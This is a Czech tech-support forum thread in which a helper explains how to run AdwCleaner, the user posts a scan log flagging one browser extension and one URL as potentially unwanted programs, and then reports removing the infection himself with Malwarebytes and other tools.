Partition 3: (Not Active) - (Size=1112 KB) - (Type=42)

========================================================
Disk: 1 (Size: 465.8 GB) (Disk ID: BEFAAE3A)

Partition: GPT.

==================== End of Addition.txt ============================

[Rudy]

Zdravím!
Spusťte tuto utilitu:

Ulozte na plochu AdwCleaner https://malwarebytes.com/adwcleaner/ nebo http://www.bleepingcomputer.com/download/adwcleaner/

ukoncete vsechny programy
odsouhlaste licencni podmiky (EULA) klikem na Souhlasim
kliknete pravym na ikonu AdwCleaneru a vyberte Spustit jako spravce (v pripade Win XP spustte obycejne dvojklikem)
kliknete na Skenovat nyni (Scan now), pote na Cisteni a opravy (Clean and Repair)
po restartu na Vas vyskoci log (pripadne jej najdete v C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt), jehoz obsah zkopirujte do pristi odpovedi

[Cryman]

Omlouvám se, zde je log

# -------------------------------
# Malwarebytes AdwCleaner 7.2.2.0
# -------------------------------
# Build: 07-17-2018
# Database: 2018-08-23.8
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start: 08-24-2018
# Duration: 00:00:13
# OS: Windows 10 Pro
# Scanned: 41805
# Detected: 2


***** [ Services ] *****

No malicious services found.

***** [ Folders ] *****

No malicious folders found.

***** [ Files ] *****

No malicious files found.

***** [ DLL ] *****

No malicious DLLs found.

***** [ WMI ] *****

No malicious WMI found.

***** [ Shortcuts ] *****

No malicious shortcuts found.

***** [ Tasks ] *****

No malicious tasks found.

***** [ Registry ] *****

No malicious registry entries found.

***** [ Chromium (and derivatives) ] *****

PUP.Optional.Legacy oiokahphinmbmakkehgelkmpolmnbkdh

***** [ Chromium URLs ] *****

PUP.Optional.Legacy 537qq.com

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries found.

***** [ Firefox URLs ] *****

No malicious Firefox URLs found.


AdwCleaner[S00].txt - [1277 octets] - [24/08/2018 21:56:49]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S01].txt ##########

[Cryman]

Díky za snahu, ale nakonec jsem virus odstranil sám ale bez Vaší pomoci bych na to nepřišel. Virus jsem odstranil kombinací Malwarebytes kdy mi ukázal infikované soubory a díky AIO balíku Windows Repair Toolbox a použití utility FreeFixer a následné ostranění nalezených souborů v Malwarebytes. Děkuji, můžete zamknout.

[Rudy]

Rádo se stalo.